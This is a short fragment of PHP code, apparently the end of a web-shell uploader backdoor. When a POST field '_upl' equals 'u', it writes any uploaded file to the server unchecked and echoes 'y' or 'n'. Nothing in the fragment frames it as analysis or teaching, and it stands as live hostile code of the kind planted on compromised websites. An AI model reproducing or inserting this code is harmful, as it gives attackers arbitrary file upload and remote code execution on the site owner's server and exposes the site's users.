'; if( $_POST['_upl'] == 'u' ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'y'; } else { echo 'n'; } } } ?>